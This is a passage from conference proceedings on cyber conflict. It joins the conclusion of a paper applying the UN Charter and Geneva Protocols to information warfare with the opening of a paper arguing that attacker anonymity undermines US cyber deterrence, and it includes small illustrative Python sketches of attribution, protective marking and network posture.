The text of the U.N. Charter offers additional support for the ‘instrumentality’ view in Article 41, which states that ‘measures not involving the use of armed force’ include ‘complete or partial interruption of (…) telegraphic, radio, and other means of communication’ (Charter of the United Nations, Art. 41). Clearly, ‘other means of communication’ fairly encompasses computer communications and communication over computer networks. It seems that Article 41 permits countries to deprive another nation of its communications; to interrupt communications by manipulating the target country's data so that it is corrupt and untrustworthy; to alter the data so as to render it useless for that nation's purpose; or to alter the data so that it achieves a purpose intended by the aggressor nation (DiCenso 2000). Although such measures sound like fair game for IW, Article 41 still requires the Security Council to decide what measures are to be employed under that article, including force and actions that do not involve armed force.

In order to retain its effectiveness, the Charter’s interpretation must evolve to some degree. The extent to which this happens is important in applying use of force analysis under Article 2(4) as new types of warfare develop. If the definition of ‘use of force’ is static, the ban on the use of force will gradually become less effective as new interstate actions occur beyond the boundaries of what the drafters considered (Barkham 2001).

Difficulty in characterizing certain forms of information warfare as ‘force’ or ‘aggression’ under international law does not mean that international legal institutions cannot respond to such attacks. For example, Chapter VII of the U.N. Charter gives the UN Security Council the authority and responsibility to determine the existence of any ‘threat to the peace’ or act of aggression (Charter of the United Nations, Art. 39), and the Council can recommend and lead responses to it (Charter of the United Nations, Art. 40). Many information attacks that may not constitute ‘force’ or ‘aggression’ could certainly be considered threats to the peace and thus subject to Security Council action, perhaps including the use of military force. After all, anything that would anger a government to the point that it might feel the need to resort to military action could thus threaten the peace, even if the provocative action was not technically illegal (Greenberg 1998).

Of particular interest for IW analysis is Article 51 of the U.N. Charter, the only exception to the rule stated in Article 2(4). According to Article 51, states can use force pursuant to the inherent right of self-defense in response to an armed attack: ‘Nothing in the present Charter shall impair the inherent right of individual or collective self-defense if an armed attack occurs against a Member of the United Nations, until the Security Council has taken measures necessary to maintain international peace and security’ (Charter of the United Nations, Art. 51). As the sole authorization of the unilateral use of force outside the U.N. Charter security system, this provision responds to the reality that the international community may not be able to react quickly enough to armed aggression to forestall an attack on a victim state. It therefore permits states and their allies to defend themselves until international help arrives pursuant to Chapter VII.


Article 51 restricts a state’s right of self-defense to situations involving ‘armed attack’, a narrower category of act than Article 2(4)’s ‘use of force’. Although coercion not involving armed force may violate Article 2(4) and result in action under Article 39, it does not follow that states may also react unilaterally pursuant to Article 51. This narrowing plainly reflects the Charter’s preference for community responses over individual ones, even to threats to peace (Schmitt 1999). In the case of an IW attack, it is also a prudent approach, given the difficulty states may have in identifying the correct source of an attack.

The main problem IW poses for Article 2(4) does not derive from its large-scale applications, but from attacks that do not destroy life or property, such as subversion of property, electronic blockades, and incursions. The large-scale attacks are similar to conventional methods of warfare and fit comfortably within traditional use of force analysis. The lower-level attacks present the problem when analyzed under Article 2(4), because they threaten to erase the distinction between acts of force and acts of coercion. The severity of an IW attack might not be identified promptly, so it would not be feasible to require a victim to conduct a damage assessment to determine whether an IW penetration was a use of force or merely coercion (Barkham 2001).

3. International legal limits on IW

3.1 Limits on the use of weapons

Many of the international legal provisions regarding armed conflicts are found in the 1949 Geneva Conventions and the 1977 Additional Protocols to the Geneva Conventions. The Geneva Conventions, with their focus on the protection of persons in enemy hands, are of some relevance to IW. Without reference to specific weapons, the Additional Protocols (AP) address various methods and means of warfare in general terms, and are thus able to provide a framework for the use of IW.

For International Humanitarian Law (IHL) to apply to a particular armed conflict, neither a formal declaration of war nor recognition of a state of war is required. Instead, the requirements of the law become applicable from the actual opening of hostilities. An international armed conflict is perceived as any difference arising between two States and leading to the intervention of armed forces, even if one of the Parties denies the existence of a state of war (Pictet 1952).

There is no doubt that an armed conflict exists and IHL applies once traditional kinetic weapons are used in combination with new methods of IW. The most difficult situation, as far as the applicability of IHL is concerned, is the one where the first, or the only, hostile acts are conducted by means of IW. The question is whether the qualification of such a conflict as an armed conflict within the meaning of the 1949 Geneva Conventions and the Additional Protocols depends on the type of attack.

As in the case of the U.N. Charter, the fact that IW developed only after the adoption of the Protocols does not exclude their applicability. The first Additional Protocol to the Geneva Conventions made specific provision for the consideration of new weapons. Article 36 of Additional Protocol I (AP I) is a strong indicator that the drafters of AP I anticipated the application of its rules to new developments in methods and means of warfare. This provision requires that ‘In the study, development, acquisition or adoption of a new weapon, means or method of warfare, a High Contracting Party is under an obligation to determine whether its employment would, in some or all circumstances, be prohibited by this Protocol or by any other rule of international law applicable to the High Contracting Party’ (Protocol Additional to the Geneva Conventions 1977). This statement obligates a nation at least to consider the laws of armed conflict before employing IW means. That consideration should focus both on the means of force and, perhaps more importantly, on the effects.

Consequently, the fact that a particular military activity constituting a method of warfare is not specifically regulated does not mean that it can be used without restrictions. On that basis, nothing precludes assuming that the more recent forms of IW, which do not involve the use of traditional weapons, are subject to IHL, just as any new weapon or delivery system has been so far when used in an armed conflict (Dörmann 2004).

Another fundamental rule of warfare, found in Article 35(1) of AP I, states that ‘the right of the Parties to the conflict to choose methods or means of warfare is not unlimited’ (Protocol Additional to the Geneva Conventions 1977). So far, hostilities have involved physical violence and kinetic energy leading to human casualties or material damage. In the case of IHL, the motivation for the application of the law is to limit the damage and provide care for the casualties. This would support an expansive interpretation of when IHL begins to apply. If a cyber attack is directed against an enemy in order to cause physical damage or loss of life, it can hardly be disputed that such an attack is in fact a method of warfare and is subject to limitations under IHL (Dörmann 2004).

3.2 The principle of distinction

Just as information warfare attacks may be difficult to encompass within the ‘use of force’ concept, it may also be difficult to define their targets as military (and thus generally legitimate targets) or civilian (generally forbidden). The dual-use nature of many telecommunications networks complicates the question of the applicability of IHL as a constraint on information warfare, because the intangible damage that cyber attacks cause may not be the sort of injury against which the humanitarian law of war is designed to protect noncombatants (Greenberg 1998).

The definition of the term ‘attack’ is of decisive importance for the application of the various rules giving effect to the principle of distinction, and for most of the rules providing special protection for certain objects. In accordance with Art. 49(1) of AP I, ‘attacks’ means acts of violence against the adversary, whether in offence or in defense (Protocol Additional to the Geneva Conventions 1977). If the term ‘acts of violence’ denotes only physical force, the concept of ‘attacks’ excludes the dissemination of propaganda, embargoes and other non-physical means of psychological, political or economic warfare (Dörmann 2004).

Based on that understanding and distinction, cyber attacks through viruses, worms, logic bombs, etc. that result in physical damage to persons, or in damage to objects going beyond the computer program or data attacked, can be qualified as ‘acts of violence’ and thus as attacks in the sense of IHL. From this point of view, it is helpful to look at how the concept of attack is applied to other means and methods of warfare. There is general agreement that, for example, the employment of biological or chemical agents that does not cause a physical explosion, such as the use of asphyxiating or poisonous gases, would constitute an attack (Dörmann 2004).

If one admits that employing an IW method constitutes an attack, AP I imposes:

- The obligation to direct attacks only against ‘military objectives’ and not to attack civilians or civilian objects (Protocol Additional to the Geneva Conventions 1977, Art. 48, 51(2), 52);
- The prohibition of indiscriminate attacks, including attacks that may be expected to cause excessive incidental civilian casualties or damage (Protocol Additional to the Geneva Conventions 1977, Art. 51(4), (5));
- The requirement to take the necessary precautions to ensure that the previous two rules are respected (Protocol Additional to the Geneva Conventions 1977, Art. 57), in particular the requirement to minimize incidental civilian damage and the obligation to abstain from attacks if such damage is likely to be excessive in relation to the value of the military objective attacked (Protocol Additional to the Geneva Conventions 1977, Art. 51(5)(b), 57(2)(a)(ii) and (iii)).

These rules operate in exactly the same way whether the attack is carried out using traditional weapons or IW techniques. Problems that arise in applying these rules are therefore not necessarily unique to IW. They relate more to the interpretation of, for example, what constitutes a military objective or which collateral damage would be excessive.

4. Legal perspectives on IW

The laws of war have always faced two challenges. The first is that war's confrontational nature and tremendously high stakes often frustrate efforts to set reasonable limits on behavior. Fortunately, the international community has generated international conventions and war crimes tribunals to address this problem.

The laws of war also face a second challenge: how to adapt to technological change. This dynamic is as old as civilization, but it has become more acute in the last hundred years as technological progress has accelerated. The result is that weapons are developing much faster than international law, and there is every reason to believe that this trend will continue to accelerate in the future.


As IW strategy and technology evolve, international law scholars will have to fit this new kind of warfare into an analytical framework developed to address a different conception of war.

First, the U.N. Charter and other existing treaty regimes do not create a clear legal prohibition of many types of IW attacks. For international law to address IW attacks effectively, a correspondence must be established between terms like ‘use of force’, ‘armed attack’ or ‘armed aggression’ and IW methods and means of combat. It would also be necessary to set limits on IW activities similar to the classic jus in bello principles, such as just war, discrimination and proportionality.

The second, and more difficult, part is to find a way to solve the practical problems associated with both launching and defending against cyber attacks, including the fundamental issue of attribution and, in particular, state responsibility for cyber attacks. It is technically challenging to localize the physical place from which such an act originates. But even if the origin of an attack can be localized within a particular state, it would be challenging to determine whether the attacker was acting in an individual capacity, or on behalf of a criminal organization, the government or the armed forces.
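The localization difficulty can be illustrated with a toy model (my own construction, not from the paper, with invented hostnames): an attack relayed through compromised intermediaries, where each node observes only the immediate previous hop, so the victim's records never contain the true origin.

```python
# Toy relay model: each node in the chain records only the address of the
# node that forwarded traffic to it. Tracing back to the true origin would
# require log access at every intermediate hop, often across jurisdictions.

def deliver(path):
    """Simulate traffic along `path`; return each node's view of the sender."""
    observed = {}
    for sender, receiver in zip(path, path[1:]):
        observed[receiver] = sender  # a node sees only the previous hop
    return observed

# Hypothetical hosts for illustration only.
path = ["attacker.example", "relay-a.example", "relay-b.example", "victim.example"]
view = deliver(path)
print(view["victim.example"])  # prints 'relay-b.example' -- not the origin
```

The victim here could name only relay-b.example as its attacker; whether that relay was a witting participant, a compromised machine or state infrastructure is precisely the question that is hard to answer.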

Just as the identity of the attacker raises difficult questions for any potential IW treaty, so does the identity of the victim. In an IW context, it becomes necessary to ask whether an attack on a company or an institution is an attack on a whole country. It is not necessarily clear that the state in whose territory the injured party resides is the injured state. In a conventional attack, the country where the attack takes place has been attacked because its territorial integrity has been violated, but cyberspace is not a customary arena over which states may exercise such control.

From a humanitarian law perspective, it would be essential to be able to ‘mark’ in some way the information systems used to maintain the viability of critical social infrastructure facilities. In the physical world, some of these facilities (such as hospitals) display a distinctive sign indicating their protected status. Such identifying signs are absent in cyberspace, and no criteria exist for designating these systems as critical infrastructure.
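To make the ‘marking’ idea concrete, a machine-readable protected-status marker might pair a declaration with an authenticity check. The sketch below is purely hypothetical (as noted, no such sign or designating authority exists): the authority, key and field names are all invented for illustration.

```python
import hashlib
import hmac

# Hypothetical shared key of an (invented) designating authority.
AUTHORITY_KEY = b"example-authority-key"

def issue_marker(system_id, category):
    """Issue a signed protected-status marker for an information system."""
    payload = f"id={system_id};status=protected;category={category}"
    tag = hmac.new(AUTHORITY_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload};sig={tag}"

def verify_marker(marker):
    """Return True only if the marker was issued under AUTHORITY_KEY."""
    payload, _, tag = marker.rpartition(";sig=")
    expected = hmac.new(AUTHORITY_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)

marker = issue_marker("hospital.example.org", "medical")
print(verify_marker(marker))                                 # True
print(verify_marker(marker.replace("medical", "military")))  # False: tampered
```

A real-world scheme would need agreed legal criteria and public-key infrastructure rather than a shared secret; the point of the sketch is only that a cyberspace analogue of the hospital's distinctive sign is technically conceivable once such criteria exist.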

5. Conclusions

Because of the newness of much of the technology involved, no provision of international law explicitly addresses information warfare. This absence of prohibitions is significant because, as a crudely general rule, what international law does not prohibit, it permits. But the absence is not dispositive, because even where international law does not address particular weapons or technologies, its general principles may apply to the use of those weapons and technologies (Greenberg 1998).

Although the existing body of international law does not necessarily provide definitive and universally accepted answers to the legal issues that the development of Information Warfare raises, it does provide a structure within which these issues can be addressed and analyzed. However, in order to apply existing norms to IW, it is necessary to accept consequence-based interpretations of ‘armed conflict’ and ‘attack’. In the absence of such understandings, the applicability, and therefore adequacy, of present-day humanitarian law principles would come into question. The consideration of IW in the context of jus ad bellum also leads to consequence-based interpretation.

Devising a system of international law addressing Information Warfare or Information Operations could rectify many of the deficiencies of the current legal system and provide states with additional functional benefits that do not currently exist. First, it could remedy uncertainty. Drafting new rules provides an opportunity to rectify the translation problems that plague IW under the law of war. It could give states and their militaries a clear sense of the rules of engagement in the information age.

A dedicated law would allow states not simply to choose among available interpretations of the prohibition on the use of force, but to craft a standard tailored to IW without the additional inclusion problems that currently exist. Similarly, states could set the bar for when IW triggers the civilian distinction requirement and address whether any or all information networks constitute legitimate military objectives.

Disclaimer: The views, opinions, and recommendations contained in this analysis are those of the author and should not be construed as an official position, policy, or decision of the Romanian Intelligence Service.



6. References

Barkham, J. (2001) "Information Warfare and International Law on the Use of Force", New York University Journal of International Law and Politics, Vol. 34, pp. 57-113.
Brownlie, I. (1963) International Law and the Use of Force by States, Clarendon Press, Oxford.
Charter of the United Nations and Statute of the International Court of Justice (1985), United Nations, Department of Public Information.
DiCenso, D. (2000) "Information Operations: An Act of War?", Air & Space Power Chronicles. Available at: http://www.airpower.maxwell.af.mil/airchronicles/cc.html
Dörmann, K. (2004) "Applicability of the Additional Protocols to Computer Network Attacks", International Expert Conference on Computer Network Attacks and the Applicability of International Humanitarian Law, Stockholm. Available at: http://www.icrc.org/web/eng/siteeng0.nsf/html/68LG92
Greenberg, L.T., Goodman, S.E. and Soo Hoo, K.J. (1998) Information Warfare and International Law, National Defense University Press. Available at: http://www.iwar.org.uk/law/resources/iwlaw/iwilindex.htm
Hollis, D.B. (2007) "Why States Need an International Law for Information Operations", Lewis & Clark Law Review, Vol. 11, p. 1023; Temple University Legal Studies Research Paper No. 2008-43. Available at: http://ssrn.com/abstract=1083889
Joint Chiefs of Staff (1998) Joint Doctrine for Information Operations, Joint Publication 3-13.
Pictet, J. (1952) Commentary on the Geneva Convention for the Amelioration of the Condition of the Wounded and Sick in Armed Forces in the Field, International Committee of the Red Cross, Geneva.
Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of International Armed Conflicts (Protocol I), 8 June 1977. Available at: http://www.icrc.org
Schmitt, M.N. (1999) "Computer Network Attack and the Use of Force in International Law: Thoughts on a Normative Framework", Columbia Journal of Transnational Law, Vol. 37, 1998-99. Available at: http://ssrn.com/abstract=1603800
Shackelford, S.J. (2009) "From Nuclear War to Net War: Analogizing Cyber Attacks in International Law", Berkeley Journal of International Law, Vol. 25, No. 3, pp. 191-250.


Cyberwarfare and Anonymity<br />

Christopher Perr<br />

Auburn University, USA<br />

cwp0002@auburn.edu<br />

Abstract: Public policy and strategy do not keep pace with technology. There is generally a lag between the<br />
release and application of a technology and the observation of a shortcoming. Once a shortcoming is<br />
revealed, it becomes a race to address that weakness with improved policy, updated strategy, a technological<br />
initiative, or a necessary combination of all three. The advent of computer-reliant and networked systems<br />
has created a modern arms race that has seen more innovation, and more need for updated policy and<br />
strategy, than any other period in history, yet the United States continues to fall behind in this arms race.<br />
When security cannot be verified, but only risk mitigated, it is time to think deterrence. Unfortunately,<br />
deterrence falls apart when you cannot identify the perpetrator behind attacks. This paper looks at the role<br />
that information has played in previous conflicts, as well as the modern strategy for protecting the United<br />
States in cyberspace, and draws a single conclusion as to the best course of action for improving our security.<br />
Through a mix of policy, strategy, and technology, the anonymity that attackers use as a shield must be<br />
eliminated in order to make room for a strong policy of deterrence with a verifiable response. By establishing<br />
the means to identify attackers and to provide serious recourse, the cybersecurity of the United States can be<br />
greatly improved.<br />

Keywords: information warfare, security, policy, strategy, history, information security<br />

1. The motivation<br />

“We’re already at war in cyberspace; have been for many years.”<br />

Gen Ronald E. Keys, Commander, Air Combat Command<br />

Fulghum (2007) reported that on 6 September 2007 Israeli aircraft flew into Syria from Turkey and destroyed<br />
a construction site. The site was thought to have contained equipment, provided by North Korea, for the<br />
refinement of weapons-grade nuclear material.<br />

The interesting part of this story, for the purposes of this paper, is that Syria, a country with an advanced<br />
anti-air defense system purchased from Russia, never saw the 10 F-15Is appear on its radar. These are not<br />
stealthy aircraft and, with weapons hanging off the wings, they should have been easily spotted on radar.<br />
Further, troops were massing at Israel’s borders, signaling a possible attack. Syria was expecting something.<br />
So what happened?<br />

The thought is that the Israelis were somehow able to disable the radar sites, providing a window in which<br />
the jets could get in, bomb the target, and leave without threat. Was it a trap door in the radar software?<br />
Did the Israelis use a special UAV to feed blank screens to the radar sites? They haven’t said yet, and the<br />
only clear part is that Israel ‘owned’ those sites for a single night and proved the strength of cyber warfare.<br />
Unfortunately, if the U.S. were in this tale, we would be more like Syria than Israel.<br />

2. Open source<br />

Due to publication constraints, and the desire to stay at the unclassified level, this paper deals only with<br />
open-source materials.<br />

3. The (not so) recent history of information operations<br />

“It is pointless to deal with enemy military forces if they can be bypassed by strategy or<br />

technology.”<br />

Col John A. Warden III, USAF, Retired<br />

Net-centric warfare has become a much-bandied-about buzzword in the modern military vernacular. A<br />
simple definition of net-centric warfare from the Office of Force Transformation (2005) is:<br />
<br />
“the translation of an information advantage, enabled in part by information technology,<br />
into a competitive war fighting advantage through the use of well-informed geographically<br />
dispersed forces.”<br />


Historical examples of this predate the coining of the term ‘IT’, one such being General William T.<br />
Sherman’s use of the telegraph to effectively shorten the kill chain of his day.<br />
<br />
The kill chain is the loop by which forces today find, fix, track, target, engage, and assess an enemy force;<br />
the exit from the loop is the destruction of the target. In Sherman’s time the kill chain was shortened by<br />
drastically cutting the time it took to communicate with his geographically separated forces. None of these<br />
terms were used in Sherman’s time, but the concept is not new.<br />
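The loop just described can be made concrete with a toy sketch. Everything here is illustrative: the stage names follow the find-fix-track-target-engage-assess formulation above, while the `run_kill_chain` function and its pass-counting stand-in for battle-damage assessment are invented for this example and are not drawn from doctrine.

```python
# Toy model of the kill chain: cycle through the six stages until
# assessment reports that the target is destroyed. The
# `target_destroyed_after` argument is a stand-in for real
# battle-damage assessment: it is the number of full passes the
# loop makes before the exit condition is met.

STAGES = ["find", "fix", "track", "target", "engage", "assess"]

def run_kill_chain(target_destroyed_after: int) -> list:
    """Return the sequence of stages executed before exit."""
    history = []
    passes = 0
    while passes < target_destroyed_after:
        history.extend(STAGES)  # one full pass through the chain
        passes += 1
    return history

# Two passes before the target is assessed as destroyed means
# twelve stage transitions in total.
print(len(run_kill_chain(2)))  # prints 12
```

Shortening the kill chain, in these terms, means reducing the wall-clock time each pass takes; Sherman’s telegraph compressed the communication step, not the number of stages.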

According to Arquilla (2007), Sherman also furnishes another example. His dependence on the telegraph,<br />
and its lack of security, was highlighted when Confederate forces began attacking the lines that carried his<br />
vital communications. This forced troops to be pulled from the battlefield to protect the lines and, while it<br />
may have come too late in the war to make a difference, diluted the Union’s forces. The telegraph showed<br />
that the kill chain can be measured not in distance but in time to decision making, and it also proved to be a<br />
possible center of gravity that doctrine had to be modified to defend.<br />

History is rife with examples of how technology has affected the way we think about and execute conflict.<br />
The telegraph arguably represents the single largest leap in communication bandwidth in history. As it came<br />
to be recognized as a powerful tool for command and control, dependence on the telegraph as the only<br />
means of controlling troops was likewise recognized as a possible center of gravity and a weakness to be<br />
exploited.<br />

4. The (more) recent history and environment of information operations<br />

“An information war is inexpensive, as the enemy country can receive a paralyzing blow<br />

through the Internet, and the party on the receiving end will not be able to tell whether it<br />

is a child’s prank or an attack from its enemy.”<br />

Wei Jincheng, excerpted from the Military Forum column, Liberation Army Daily, 25 June<br />

1996<br />

The First Gulf War is widely viewed as a major success (Campen, 1992). The preparations involved<br />
repetitive rehearsal, planning, critique, and then more rehearsal. The rest of the world watched as what was,<br />
at the time, the fourth-largest force in the world was rolled over in a matter of days. That was 1991, and even<br />
though the communication network was almost thrown together, the tactics and techniques it enabled<br />
proved to be game-changing.<br />

Baocun and Fei (2010) note that by 1995 forces around the globe had taken such notice of the revolutionary<br />
way U.S. forces had combined modified blitzkrieg maneuvers with supreme command and control, enabled<br />
by a technical advantage, that those forces changed their own strategy and force composition. It was clear<br />
that smart weapons and the use of information warfare had had a profound effect.<br />

Fast forward a bit, and a lot has happened since the Gulf War. In 2007 a conflict arose between Estonia and<br />
Russia over the existence and placement of the Bronze Soldier of Tallinn. This spawned what the Russian<br />
government called an ‘online response by patriotic individual citizens’. Estonia, a ‘highly connected, web-friendly’<br />
country, became the victim of various botnet and denial-of-service attacks, which brought the internet in<br />
that country to a halt. Waterman (2007) wrote that the attack was characterized by Professor James<br />
Hendler, a former chief scientist at DARPA, as<br />
<br />
“...more like a cyber riot than a military attack”<br />
<br />
Speculation implies that the Russian government sought out the help of organized crime and individual<br />
hackers to carry out the attacks. The effect was the same as a conventional siege, yet the attacks were<br />
dismissed as a ‘crime’ by the Russians. The Estonian government requested aid in the investigation, as<br />
outlined in the Mutual Legal Assistance Treaty. Russia declined the request (Leyden, 2008).<br />

Another case to look at is the cyber attacks perpetrated by North Korea on the United States and South<br />
Korea in July of 2009. On the 4th of July, North Korea hit a large number of government websites with<br />
botnet and DDoS attacks, apparently seeking political bargaining power. The attacks were felt only mildly in<br />
the U.S., thanks to address filtering and the distribution of website sources, but they again helped to show<br />
how vulnerable we are to even unsophisticated cyber attacks (U.S. eyes N. Korea for ‘massive’ cyber<br />
attacks, 2010).<br />

5. The current state of our cyber doctrine<br />

“It has become appallingly obvious that our technology has exceeded our humanity.”<br />
<br />
Albert Einstein<br />

The opening of this paper ends with a fairly controversial statement, and deliberately so. The cases of Iran<br />
and Syria show how a dependence on technology can seriously threaten a nation. Evidence suggests that<br />
the United States may be overly dependent on technology in key areas, with a limited ability to defend itself.<br />
Our current policies regarding cyber warfare serve as the main cause.<br />

The most recent example supporting this statement is found in the written answers that General Keith<br />
Alexander, the nominee for commander of the new Cyber Command, provided to the Senate Armed<br />
Services Committee on 15 April 2010. To one question he answered:<br />

“President Obama’s cybersecurity sixty-day study highlighted the mismatch between our<br />

technical capabilities to conduct operations and the governing laws and policies, and our<br />

civilian leadership is working hard to resolve the mismatch (Markoff, 2010).”<br />

General Alexander’s response highlights an ongoing issue in the Department of Defense and, since the<br />
United States’ vulnerability extends into the civil realm, in public policy as well. General Alexander also<br />
speaks to the large gap created by having very effective offensive cyber capabilities without comparably<br />
developed defensive capabilities.<br />

The 2003 Information Operations Roadmap served as the initial White House-level guide for how the<br />
armed forces conduct information operations (Miller, 2010). The document is very general and pitched<br />
above the specifics of cyber warfare, but some important information can be gleaned from it. First, cyber<br />
warfare is treated as an extension of information and conventional operations. Second, it concluded that our<br />
policy and force preparedness were not at a level capable of meeting the country’s cyber needs. Third, the<br />
civil realm of cyber operations was almost completely ignored, except to note that operations could have<br />
some civil effect and that such considerations should be weighed.<br />

The only other recurring theme in the document is the need to “deny, degrade, disrupt or destroy a broad<br />
range of adversary threats, sensors, command and control and critical support infrastructure.” This seems to<br />
assume that when cyber comes into play, it will only be against another country with a dependence on<br />
technology similar to that of the United States. The document also highlights how the term “cyber war” can<br />
be incredibly limiting, neglecting many of the tactics and resources that could be utilized if cyber operations<br />
were not limited to ‘conventional war’ alone.<br />

The first theme is vital to understand, and is echoed in a recent Air and Space Power Journal article, “Cyber<br />
This, Cyber That...So What?” (Trias, 2010). The article advocates integrating cyberspace and counter-cyberspace<br />
operations with everything from special operations to aerial refueling. Given the pervasive<br />
nature of cyberspace, almost all doctrine should be reviewed to include at least the defensive elements of<br />
cyber security, and most could probably benefit from considering how offensive cyber operations could aid<br />
mission effectiveness.<br />

The article also recognizes how slow going and agonizing the process of updating doctrine without<br />

clear policy guidance can be.<br />

“Air Force strategists are struggling to create doctrinal principles for cyber warfare in the<br />

form of Air Force Doctrine Document (AFDD) 2-11, “Cyberspace Operations,” now<br />

several years in draft.” (Trias, 2010)<br />

The reason the Air Force could be having such a difficult time is linked to our second issue. In response to<br />
the Information Operations Roadmap, major changes began to take place in the cyber realm. New<br />
commands and squadrons were stood up across the Department of Defense (DoD) in what, from the<br />
outside, looked like a power grab; in eventual response it was decided that a new joint command was<br />
needed to oversee cyber operations and defense, and to track capabilities and assets across the DoD.<br />


This command is the new U.S. Cyber Command, announced in June of 2009. Before that, the Air Force had<br />
hoped to form its own combatant command, but instead settled for a numbered command. The Navy and<br />
Army have their own units as well. With all these new units, confusion regarding responsibility is inevitable.<br />
<br />
The mission of U.S. Cyber Command is:<br />
<br />
“...to coordinate computer-network defense and direct U.S. cyber attack operations”<br />
(US military prepares for ‘cyber command’, 2010).<br />

Unfortunately, this new command with a somewhat clear mission did not solve all of the ills that cyberspace<br />
has created. In January of 2010 the Pentagon attempted to respond to a simulated cyber attack.<br />

“The results were dispiriting. The enemy has all the advantages: stealth, anonymity, and<br />
unpredictability. No one could pinpoint the country from which the attack came, so there<br />
was no effective way to deter further damage by threatening retaliation. What’s more, the<br />
military commanders noted that they even lacked the military authority to respond, especially<br />
because it was never clear if the attack was an act of vandalism, an attempt at<br />
commercial theft, or a state-sponsored effort to cripple the United States, perhaps as a<br />
prelude to conventional war (Markoff, 2010).”<br />

As U.S. Cyber Command has not yet officially stood up, it can only be hoped that the response to a cyber<br />
attack will improve once a governing body has been established. Unfortunately, this still leaves a third<br />
problem in our cyber strategy: what about the civilian side?<br />

In March 2010 a graduate student in Liaoning, China, named Wang Jianwei authored a paper titled<br />
“Cascade-Based Attack Vulnerability on the U.S. Power Grid.” The paper actually had nothing to do with<br />
attacking the U.S. power grid; it was a technical exercise aimed at increasing security for networked power<br />
grids. The paper still provoked cries of outrage and questions about who was in charge of our grid’s<br />
well-being. The interesting point to note is that Wang chose the U.S. power grid because it had the most<br />
information available on the inner workings of the network (Markoff, 2010).<br />

At the same time, according to Nielsen Online, as of August 2009 almost 75% of the United States<br />
population was listed as ‘users of the internet’ (Miniwatts Marketing Group, 2009). ‘Internet use’ of course<br />
includes activities like banking, social networking, commerce, and business. Without even mentioning<br />
necessities like the power grid and other services, the e-commerce sector alone was worth more than $100<br />
billion in 2007. It is easy to see why the civilian sector would have a vested interest in the handling of<br />
cybersecurity. The concern is that the DoD will dominate the area of cybersecurity and the civilian side will<br />
be forced to submit to harsh and sometimes arbitrary regulation.<br />

What is the answer to these concerns about the DoD’s dominance of cyber security and operations? The<br />
Department of Homeland Security will eventually receive a Director for Cybersecurity, and currently has in<br />
place an Office of Cybersecurity and Communications, whose specific responsibility is listed below.<br />

“The Office of Cybersecurity and Communications (CS&C) is responsible for enhancing<br />

the security, resiliency, and reliability of the nation’s cyber and communications<br />

infrastructure. CS&C actively engages the public and private sectors as well as<br />

international partners to prepare for, prevent, and respond to catastrophic incidents that<br />

could degrade or overwhelm these strategic assets (Department of Homeland Security,<br />

2010).”<br />

As of right now it could be said that little of this is taking place. Recently, when Google first feared that its<br />
operation in China had been hacked, it turned to the NSA, not the Department of Homeland Security, to<br />
help sort out the problem (Markoff, 2010). Where is the communication, and the organization determining<br />
who deals with what? This is without even mentioning that the FBI and the Secret Service both have units<br />
that work in cyber security. The FBI is now also responsible for investigating cyber crime against U.S.<br />
companies even when the attack originates well outside our borders (FBI probes cyber attack on Citigroup,<br />
2010). With convoluted policies and rapid changes, it is easy to see how one might be confused. There is<br />
no clear guide as to who responds, or how. Unfortunately, that does not bode well for the defense of the<br />
United States. The best that can be said about the current state of our cyber doctrine and policies is that we<br />
are rapidly improving, but are not there yet.<br />

6. The proposition<br />

“The dogmas of the quiet past are inadequate to the stormy present. The occasion is<br />

piled high with difficulty, and we must rise with the occasion. As our case is new, so we<br />

must think anew and act anew.”<br />

Abraham Lincoln, President of the United States<br />

Message to Congress, 1 December 1862<br />

When the nuclear bomb was unleashed on the world, individual countries began seeking their own nuclear<br />
weapons; as a country it was difficult to feel safe without one. With a weapon so massive, it was important<br />
that the party with ‘the bomb’ knew that you had the same capability, and that you would use it if necessary.<br />
Unfortunately, this strategy seems ripe to fall apart as the technology proliferates to anonymous parties.<br />
Cyberwar has a lot in common with the development of strategy for nuclear weapons: it is a massive<br />
revolution in warfighting that has spawned a new arms race. Unfortunately, anonymity is already a very<br />
serious issue. Anonymous parties are able to develop and use very powerful informational weapons, and<br />
there is little to identify them or to link them to a party that can be held accountable. On the bright side,<br />
while we cannot yet invent a safe nuclear bomb, we can invent a safer internet by making several<br />
improvements to the one we have now. Let’s think of these improvements in terms of the three ways to<br />
affect cybersecurity: strategy, policy, and technological advancement.<br />

Strategy needs to be considered for both the short term and the long term, and is closely tied to<br />
technological development. In the short term it is best to consider how to continue patching and modifying<br />
our current internet protocols to create a defensible position in cyberspace. This basically means applying<br />
some common rules of cybersecurity. If it doesn’t need to be online, don’t put it online. If there are serious<br />
benefits to be gained by networking a system, such as networking the power grid to facilitate more efficient<br />
generation of power, then by all means network the system, but keep it as closed off and private as<br />
possible. Finally, when you do need to expose something to the internet or transmit information, keep<br />
classified information separate and secure the site as much as possible. Don’t forget to compartmentalize<br />
the system as much as possible, geographically distribute your network where appropriate, keep constant<br />
backups, and maintain an appropriate level of redundancy. For the short term, if these rules are applied<br />
judiciously, we just might make it out alive.<br />
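The rules above reduce to a small decision procedure for how connected a system should be. The sketch below is a hypothetical illustration only: the `System` fields and the policy labels are invented for this example and are not drawn from any official checklist.

```python
from dataclasses import dataclass

@dataclass
class System:
    needs_network: bool       # does networking yield a serious benefit?
    handles_classified: bool  # does it process classified information?

def connectivity_policy(system: System) -> str:
    """Apply the short-term rules: offline if possible, closed and
    private if networking pays off, hardened if it must face the
    internet. Compartmentalization, geographic distribution, backups,
    and redundancy apply in every case."""
    if not system.needs_network:
        # "If it doesn't need to be online, don't put it online."
        return "offline"
    if system.handles_classified:
        # Classified information stays on a separate, closed network.
        return "closed-private-network"
    # Otherwise: secure the internet-facing site as much as possible.
    return "hardened-internet-facing"

print(connectivity_policy(System(needs_network=False, handles_classified=False)))  # prints offline
```

The point of expressing the rules this way is that each system gets exactly one posture, decided by answering the two questions in order; the remaining rules (compartmentalize, distribute, back up) are orthogonal and apply regardless of the posture chosen.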

Technological advancement and policy will play a smaller but still vital role in the short term.<br />
Technologically, it would be impossible to create the defensible position without working to defeat and patch<br />
the vulnerabilities that attacks exploit, and to track the perpetrators to the ultimate conclusion. To ignore<br />
current security flaws in the hope that the next update will close the gap would be to look the other way at<br />
our own peril, and to embolden the individuals or governments exploiting the flaws in the current system. In<br />
the short term, policy should clearly define the jurisdiction and responsibilities of the agencies and military<br />
